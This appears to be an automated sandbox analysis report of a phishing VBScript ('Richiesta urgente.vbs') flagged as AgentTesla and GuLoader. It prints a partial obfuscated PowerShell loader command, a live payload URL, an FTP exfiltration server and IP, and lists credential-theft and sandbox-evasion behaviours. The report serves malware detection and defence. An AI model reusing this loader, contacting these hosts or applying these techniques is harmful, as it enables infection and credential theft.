Windows Analysis Report
Richiesta urgente.vbs

Overview

General Information

Sample Name: Richiesta urgente.vbs
Analysis ID: 755115
MD5: de0edf01710a38b1e96688ae2f712ebb
SHA1: 6791a70cf79c415ba109e86734bcfd1b4930ec31
SHA256: 20796159ce1191fe88603ee4be1855bca614bcb29161d149a6990b48589d88c5
Tags: vbs

Detection

AgentTesla, GuLoader
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Malicious sample detected (through community Yara rule)
Yara detected AgentTesla
Sigma detected: Dot net compiler compiles file from suspicious location
VBScript performs obfuscated calls to suspicious functions
Multi AV Scanner detection for domain / URL
Yara detected GuLoader
Tries to steal Mail credentials (via file / registry access)
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to detect Any.run
Wscript starts Powershell (via cmd or directly)
Potential malicious VBS script found (suspicious strings)
Tries to harvest and steal ftp login credentials
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Very long command line found
Found evasive API chain (trying to detect sleep duration tampering with parallel thread)
Potential evasive VBS script found (use of timer() function in loop)
Obfuscated command line found
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Tries to harvest and steal browser information (history, passwords, etc)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Yara signature match
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Sample execution stops while process was sleeping (likely an evasion)
Yara detected Credential Stealer
Contains functionality to call native functions
Found dropped PE file which has not been started or loaded
IP address seen in connection with other malware
Contains long sleeps (>= 3 min)
Abnormal high CPU Usage
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Java / VBScript file with very long strings (likely obfuscated code)
Drops PE files
Uses a known web browser user agent for HTTP communication
Uses FTP
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Compiles C# or VB.Net code
Creates a process in suspended mode (likely to inject code)
Found WSH timer for Javascript or VBS script (likely evasive script)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

AV Detection

Source: ftp.mcmprint.net Virustotal: Detection: 9%
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe File opened: C:\Windows\WinSxS\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.9445_none_d08c58b4442ba54f\MSVCR80.dll
Source: Binary string: fk8C:\Users\user\AppData\Local\Temp\2vgl23kr\2vgl23kr.pdb source: powershell.exe, 00000003.00000002.738843445.0000000004AE7000.00000004.00000800.00020000.00000000.sdmp
Source: Joe Sandbox View IP Address: 185.31.121.136 185.31.121.136
Source: global traffic HTTP traffic detected: GET /nnslx/arPdDEHecKTUsOQSyN133.asi HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: qwedft.gqCache-Control: no-cache
Source: unknown FTP traffic detected: 185.31.121.136:21 -> 192.168.2.5:49711 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 1 of 50 allowed.220-Local time is now 12:08. Server port: 21.220-This is a private system - No anonymous login220-IPv6 connections are also welcome on this server.220 You will be disconnected after 15 minutes of inactivity.
Source: CasPol.exe, 0000000A.00000002.835470599.000000001DB51000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: ftp://ftp.mcmprint.netnoffice
Source: CasPol.exe, 0000000A.00000002.835470599.000000001DB51000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://127.0.0.1:HTTP/1.1
Source: CasPol.exe, 0000000A.00000002.836359577.000000001DBDA000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 0000000A.00000002.835470599.000000001DB51000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 0000000A.00000002.836857074.000000001DC27000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 0000000A.00000003.734109094.0000000001621000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://3LpbHlMRrrHdHc2KU.net
Source: CasPol.exe, 0000000A.00000002.835470599.000000001DB51000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://DynDns.comDynDNSnamejidpasswordPsi/Psi
Source: CasPol.exe, 0000000A.00000002.835470599.000000001DB51000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://OowQOv.com
Source: powershell.exe, 00000003.00000003.515219304.0000000007748000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crl.m
Source: powershell.exe, 00000003.00000003.515219304.0000000007748000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crl.micr
Source: powershell.exe, 00000003.00000002.755141818.00000000057BF000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000003.00000002.732273306.000000000489F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: CasPol.exe, 0000000A.00000002.823176402.000000000178B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://qwedft.gq/nnslx/arPdDEHecKTUsOQSyN133.asi
Source: powershell.exe, 00000003.00000002.727863466.0000000004761000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000003.00000002.732273306.000000000489F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 00000003.00000002.755141818.00000000057BF000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000003.00000002.755141818.00000000057BF000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000003.00000002.755141818.00000000057BF000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/License
Source: powershell.exe, 00000003.00000002.732273306.000000000489F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000003.00000002.751015129.0000000004FA0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://go.micro
Source: powershell.exe, 00000003.00000002.755141818.00000000057BF000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://nuget.org/nuget.exe
Source: CasPol.exe, 0000000A.00000002.835470599.000000001DB51000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.ziphttps://www
Source: unknown DNS traffic detected: queries for: qwedft.gq

System Summary

Source: Process Memory Space: powershell.exe PID: 5840, type: MEMORYSTR Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\cmd.exe CMD.EXE /c echo C:\Windows
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Skolegaardene = """ReABedSadDi-FiTGeySjpSyeAn De-ChTHeyTepAneLaDReeOpfPriNonMiiPrtSainooScnKa Da'KouRisFoiUdnMygSy SySImyInsOftTreTumok;SuuStsNyiSunBigDr TrSMiyAssDatDeePrmTi.DoRMiuManSotCoiGamDueBi.BoIAnnSotPheOprInoUdpTeSDeeOmrgovStiKncTreDesFo;oppSiuPabFolVaiAfcGl ElsShtFiaBatHviCocOt dacUnlRyaDzsSpsOr SiRChePraUdbStrGiiSidAdgPaeNodAt1Ch In{Cr[FjDDrlAdlSqIHemTapKooBerVatDe(Ne`"""SowOwiHanSamBlmBa.DedSalBalIn`"""Bi)Sg]KopPeuAsbFolUniHocMy PrsGrtUnaSetIniStcSi HaeNexSktBrePorFenGe uniUnnArtMa HomCaiMbdSaiSuOTjuLgtNoOZipFoeJrnXs(SmiOrnButbr PokPrvAbaTalMoiBe,TiiganSatth brKAtovinTe,ZaiLunDitAd KoRRuiOvnPegSaeAtdTh,RriBanTrtDe SpUOunPywFooHe,HoiKnnGetHa koUWidGreRe)Co;as[MuDTulAllReIThmNopBloBrrFitNe(Ud`"""SekUneserObnOmeBilHl3Up2Te`"""He)av]RipAruFubOclFiiCucMa AssEmtSaaDrtApiFrcTu RaeStxDitKieVerMenPr JiiFanOvtLo ArLMooPecviaAulprSUnhCarPoihunSvkde(OuiUnnHitSt ResDycPuoUnrTupGriBr,WhiVenDotSt StNSasFikOveMatImnUp)Eu;Fg[GuDHylAnlFuIPemAfpLeoWirMutRa(Kh`"""VekBieEmrAdnPueanlNl3Ek2bl`"""Sp)Pe]RepGeuRebPrlReiRacSt desBetTaaMatFiiFocOm SheFaxPitDieUnrTanko BliSunKatKe ScSAreCatAnCUdoMomBomSiSDitCaazatAmeRe(UniSmnExtSe CoKCuoBefAltSmaAf,NaiAfnLatSu scSLatKaoHorHorTryBu)sk;Kr[LiDstlImlcuIHomEkpTaoRkrBrtSh(Pu`"""PskFeeSkrAnnOpeunlBi3Sp2ut`"""Va)Gr]GopOruPabOvlUpiShcSu VesBetLaaIstPtiSncEn PueBuxAgtCoeunrCanUe AliMonvetCe TrHLeeSaaSlpJaCDyrSieDiaAftTieDr(IliGrnUdtEn ScNDoeDocWirHioSapBe,BiiVonSitDo GaFSelafsFnkPr,IniInnAntOs moGSirSpuFipLe)Al;Sy[brDUplAblSeIPomSupTeoBarbltGl(Af`"""PrkCoeXerBanFleAflsy3Br2Ma`"""un)Tr]HepNauNobColUliRecUd SrsDetThaRotKuiIscPh GreBexFrtGeeSprMinVi CiiFinwotDe StVFaipsrZotThuMiaOplStAArlUnlAgoGrcbo(DaiSanSytAf EqvEp1Sy,hoiDenOxtSt UnvMe2Be,TriKonKotro SkvFl3wi,FoiMonGatFi 
StvMi4Ch)Be;Tu[PaDAtlBglOpIKomPhpLaoBarSptWa(Ma`"""ThiJamRemDe3Ba2Vi.HedSolSalBa`"""Fe)Br]SepLuuEnbAflDeiHocSk LusHytViaantKoiPocZr NoeDrxUrtCleFardonBl HeiBanBrtXe hvIBlmRhmAgSkreDetEvSMatFiaRatUduAnsDuWAniRunKedDioOpwTrPBroAnsPu(CoiUnnDitBa NePPoaSklSkaEn,ChiRenXetAl skRPyaInzNe)Me;Bi[VaDRelRhlAnIsemifpOuochrFrtDe(Ti`"""omAHyDwiVreAfaPGrIPh3Sn2Mi.SpDNiLPlLVu`"""Ep)Un]VepCluSsbGelReiAfcFl drsLgtMiaErtPaiOpcna SheSixCytOpeGerBenSu UniStnTitAk BaISnnTriSotMaiScaGrlPaiejzCoeAnAKactalBe(PoiPunHntRu TeCTioAclBa,AaiSynMetMi LeUPinDeaPr,AfiMenRetAs FaFMelFroTepOrpOl2na0Ma1Sn)Mi;In[DeDSalPalslIChmNopEroPhrEutSc(Pa`"""EngSvdTaiOl3Re2so`"""Ud)Qu]FipHyuSkbAdlMaiGucGi OcsUdtlaaMotReiFrcSk IjeWixAxtqueUnrHanBo GeiCinMatSa HuSSeeRatBeWEdiLinBldEnoMewFuEPexNotBrEStxPl(SliSanNvtGe biDDauDacFl,buiTynCetTo UdHToeLanHubHulDy,AniBenOutTi MoSKuiBrdRaecotCaaFo,IsiTinThtUb AfAUlpFrpIsaTosIs)Pa;Uf[AuDTilCalAfIScmBapOmoIkrHetOm(Un`"""MygPrdAliPa3An2Tr`"""Un)Th]RopjouCebMalFliBlcBl AgsLrtPyaBetHjiCocUl TaeVoxFotAfeNorAlnBy CoiAunIttHa NaUTrnNorIgeGeakelNoiVazAneStOSjbEnjSieOpcFrtUn(LeiHjnUntKi RvHNooBiwBeeFraManhe)Su;Sp[CaDDilUdlPlIBemFrpNooEgrDitDe(Ce`"""couDesAg
Source: Initial file: Jibboom.ShellExecute Cystatrophia162, " " & chrw(34) & A5 & chrw(34), "", "", 0
Source: C:\Windows\System32\wscript.exe Process created: Commandline size = 5465
Source: Richiesta urgente.vbs, type: SAMPLE Matched rule: WScript_Shell_PowerShell_Combo date = 2018-02-07, author = Florian Roth, description = Detects malware from Middle Eastern campaign reported by Talos, score = 15f5aaa71bfa3d62fd558a3e88dd5ba26f7638bf2ac653b8d6b8d54dc7e5926b, reference = http://blog.talosintelligence.com/2018/02/targeted-attacks-in-middle-east.html, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: amsi64_4088.amsi.csv, type: OTHER Matched rule: WScript_Shell_PowerShell_Combo date = 2018-02-07, author = Florian Roth, description = Detects malware from Middle Eastern campaign reported by Talos, score = 15f5aaa71bfa3d62fd558a3e88dd5ba26f7638bf2ac653b8d6b8d54dc7e5926b, reference = http://blog.talosintelligence.com/2018/02/targeted-attacks-in-middle-east.html, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: Process Memory Space: powershell.exe PID: 5840, type: MEMORYSTR Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 3_2_009A0040 3_2_009A0040
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 3_2_009A8868 3_2_009A8868
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 3_2_009A4968 3_2_009A4968
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 3_2_009A7B90 3_2_009A7B90
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 3_2_00A40040 3_2_00A40040
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 3_2_009A4958 3_2_009A4958
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Code function: 10_2_0136BA76 10_2_0136BA76
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Code function: 10_2_1DA00B7D 10_2_1DA00B7D
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Code function: 10_2_1DB3D832 10_2_1DB3D832
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Code function: 10_2_1DB37E50 10_2_1DB37E50
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Code function: 10_2_20220900 10_2_20220900
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Code function: 10_2_20220070 10_2_20220070
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Code function: 10_2_20222940 10_2_20222940
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Code function: 10_2_202208A0 10_2_202208A0
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Code function: 10_2_209E9CF8 10_2_209E9CF8
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Code function: 10_2_209E6050 10_2_209E6050
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Code function: 10_2_209EBE98 10_2_209EBE98
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Code function: 10_2_209EC2D8 10_2_209EC2D8
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Code function: 10_2_209EA6EC 10_2_209EA6EC
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Code function: 10_2_209E3FF0 10_2_209E3FF0
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Code function: 10_2_1D95AFDA NtQuerySystemInformation, 10_2_1D95AFDA
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Code function: 10_2_1D95AFB8 NtQuerySystemInformation, 10_2_1D95AFB8
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process Stats: CPU usage > 98%
Source: Richiesta urgente.vbs Initial sample: Strings found which are bigger than 50
Source: C:\Windows\System32\wscript.exe Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: unknown Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Richiesta urgente.vbs"
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\cmd.exe CMD.EXE /c echo C:\Windows
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\2vgl23kr\2vgl23kr.cmdline
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESA66C.tmp" "c:\Users\user\AppData\Local\Temp\2vgl23kr\CSC2C40FF502EE54A39B5D71CE974C4B10.TMP"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\caspol.exe
Source: C:\Windows\System32\wscript.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Code function: 10_2_1D95AAB6 AdjustTokenPrivileges, 10_2_1D95AAB6
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Code function: 10_2_1D95AA7F AdjustTokenPrivileges, 10_2_1D95AA7F
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_qdv1nroa.nix.ps1
Source: classification engine Classification label: mal100.troj.spyw.expl.evad.winVBS@13/10@2/2
Source: C:\Windows\System32\wscript.exe File read: C:\Users\user\Desktop\desktop.ini
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Section loaded: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorlib.dll
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Section loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\9603718106bd57ecfbb18fefd769cab4\mscorlib.ni.dll
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Section loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Section loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4540:120:WilError_01
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Mutant created: \Sessions\1\BaseNamedObjects\Global\.net clr networking
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1092:120:WilError_01
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676

Data Obfuscation

Source: C:\Windows\System32\wscript.exe Anti Malware Scan Interface: WScript.Shell");IWshShell3.Exec("CMD.EXE /c echo %windir%");IHost.CreateObject("WScript.Shell");IWshShell3.Exec("CMD.EXE /c echo %windir%");IWshExec.StdOut();ITextStream.ReadLine();IWshShell3.RegWrite("HKEY_CURRENT_USER\Antar\Handlings\Detekteringernes", "cQGbcQGbuqdXJKrrAmx26wLrX4HqxXyk4nEBm+sC5jeB8kIefsfrApk4cQGb6wLc7XEBm+tP", "REG_SZ");IFileSystem3.FileExists("C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe");IShellDispatch6.ShellExecute("C:\Windows\syswow64\WindowsPowerShell\v", " "$Skolegaardene = """ReABedSadDi-FiTGe", "", "", "0")
Source: Yara match File source: 00000003.00000002.759722470.0000000006CF0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000000.627203109.0000000001350000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Skolegaardene = """ReABedSadDi-FiTGeySjpSyeAn De-ChTHeyTepAneLaDReeOpfPriNonMiiPrtSainooScnKa Da'KouRisFoiUdnMygSy SySImyInsOftTreTumok;SuuStsNyiSunBigDr TrSMiyAssDatDeePrmTi.DoRMiuManSotCoiGamDueBi.BoIAnnSotPheOprInoUdpTeSDeeOmrgovStiKncTreDesFo;oppSiuPabFolVaiAfcGl ElsShtFiaBatHviCocOt dacUnlRyaDzsSpsOr SiRChePraUdbStrGiiSidAdgPaeNodAt1Ch In{Cr[FjDDrlAdlSqIHemTapKooBerVatDe(Ne`"""SowOwiHanSamBlmBa.DedSalBalIn`"""Bi)Sg]KopPeuAsbFolUniHocMy PrsGrtUnaSetIniStcSi HaeNexSktBrePorFenGe uniUnnArtMa HomCaiMbdSaiSuOTjuLgtNoOZipFoeJrnXs(SmiOrnButbr PokPrvAbaTalMoiBe,TiiganSatth brKAtovinTe,ZaiLunDitAd KoRRuiOvnPegSaeAtdTh,RriBanTrtDe SpUOunPywFooHe,HoiKnnGetHa koUWidGreRe)Co;as[MuDTulAllReIThmNopBloBrrFitNe(Ud`"""SekUneserObnOmeBilHl3Up2Te`"""He)av]RipAruFubOclFiiCucMa AssEmtSaaDrtApiFrcTu RaeStxDitKieVerMenPr JiiFanOvtLo ArLMooPecviaAulprSUnhCarPoihunSvkde(OuiUnnHitSt ResDycPuoUnrTupGriBr,WhiVenDotSt StNSasFikOveMatImnUp)Eu;Fg[GuDHylAnlFuIPemAfpLeoWirMutRa(Kh`"""VekBieEmrAdnPueanlNl3Ek2bl`"""Sp)Pe]RepGeuRebPrlReiRacSt desBetTaaMatFiiFocOm SheFaxPitDieUnrTanko BliSunKatKe ScSAreCatAnCUdoMomBomSiSDitCaazatAmeRe(UniSmnExtSe CoKCuoBefAltSmaAf,NaiAfnLatSu scSLatKaoHorHorTryBu)sk;Kr[LiDstlImlcuIHomEkpTaoRkrBrtSh(Pu`"""PskFeeSkrAnnOpeunlBi3Sp2ut`"""Va)Gr]GopOruPabOvlUpiShcSu VesBetLaaIstPtiSncEn PueBuxAgtCoeunrCanUe AliMonvetCe TrHLeeSaaSlpJaCDyrSieDiaAftTieDr(IliGrnUdtEn ScNDoeDocWirHioSapBe,BiiVonSitDo GaFSelafsFnkPr,IniInnAntOs moGSirSpuFipLe)Al;Sy[brDUplAblSeIPomSupTeoBarbltGl(Af`"""PrkCoeXerBanFleAflsy3Br2Ma`"""un)Tr]HepNauNobColUliRecUd SrsDetThaRotKuiIscPh GreBexFrtGeeSprMinVi CiiFinwotDe StVFaipsrZotThuMiaOplStAArlUnlAgoGrcbo(DaiSanSytAf EqvEp1Sy,hoiDenOxtSt UnvMe2Be,TriKonKotro SkvFl3wi,FoiMonGatFi 
StvMi4Ch)Be;Tu[PaDAtlBglOpIKomPhpLaoBarSptWa(Ma`"""ThiJamRemDe3Ba2Vi.HedSolSalBa`"""Fe)Br]SepLuuEnbAflDeiHocSk LusHytViaantKoiPocZr NoeDrxUrtCleFardonBl HeiBanBrtXe hvIBlmRhmAgSkreDetEvSMatFiaRatUduAnsDuWAniRunKedDioOpwTrPBroAnsPu(CoiUnnDitBa NePPoaSklSkaEn,ChiRenXetAl skRPyaInzNe)Me;Bi[VaDRelRhlAnIsemifpOuochrFrtDe(Ti`"""omAHyDwiVreAfaPGrIPh3Sn2Mi.SpDNiLPlLVu`"""Ep)Un]VepCluSsbGelReiAfcFl drsLgtMiaErtPaiOpcna SheSixCytOpeGerBenSu UniStnTitAk BaISnnTriSotMaiScaGrlPaiejzCoeAnAKactalBe(PoiPunHntRu TeCTioAclBa,AaiSynMetMi LeUPinDeaPr,AfiMenRetAs FaFMelFroTepOrpOl2na0Ma1Sn)Mi;In[DeDSalPalslIChmNopEroPhrEutSc(Pa`"""EngSvdTaiOl3Re2so`"""Ud)Qu]FipHyuSkbAdlMaiGucGi OcsUdtlaaMotReiFrcSk IjeWixAxtqueUnrHanBo GeiCinMatSa HuSSeeRatBeWEdiLinBldEnoMewFuEPexNotBrEStxPl(SliSanNvtGe biDDauDacFl,buiTynCetTo UdHToeLanHubHulDy,AniBenOutTi MoSKuiBrdRaecotCaaFo,IsiTinThtUb AfAUlpFrpIsaTosIs)Pa;Uf[AuDTilCalAfIScmBapOmoIkrHetOm(Un`"""MygPrdAliPa3An2Tr`"""Un)Th]RopjouCebMalFliBlcBl AgsLrtPyaBetHjiCocUl TaeVoxFotAfeNorAlnBy CoiAunIttHa NaUTrnNorIgeGeakelNoiVazAneStOSjbEnjSieOpcFrtUn(LeiHjnUntKi RvHNooBiwBeeFraManhe)Su;Sp[CaDDilUdlPlIBemFrpNooEgrDitDe(Ce`"""couDesAg
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Code function: 10_2_1DB3D832 pushfd ; ret 10_2_1DB3DE91
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Code function: 10_2_209E394B push 8BFFFFFFh; retf 10_2_209E3950
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Code function: 10_2_209E3622 push ebp; iretd 10_2_209E3628
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\2vgl23kr\2vgl23kr.cmdline
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe File created: C:\Users\user\AppData\Local\Temp\2vgl23kr\2vgl23kr.dll
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Program Files\Qemu-ga\qemu-ga.exe
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Program Files\qga\qga.exe
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe File opened: C:\Program Files\Qemu-ga\qemu-ga.exe
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe File opened: C:\Program Files\qga\qga.exe
Source: powershell.exe, 00000003.00000002.724108628.0000000000C2A000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \??\C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXE*
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Function Chain: memAlloc,threadCreated,memAlloc,memAlloc,threadResumed,threadDelayed,processSet,memAlloc,processSet,memAlloc,memAlloc,memAlloc,threadDelayed,processSet,memAlloc,memAlloc,threadDelayed,memAlloc,threadDelayed,threadDelayed,systemQueried,threadDelayed,threadDelayed,memAlloc,threadDelayed
Source: Initial file Initial file: do while timer-temp<sec
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
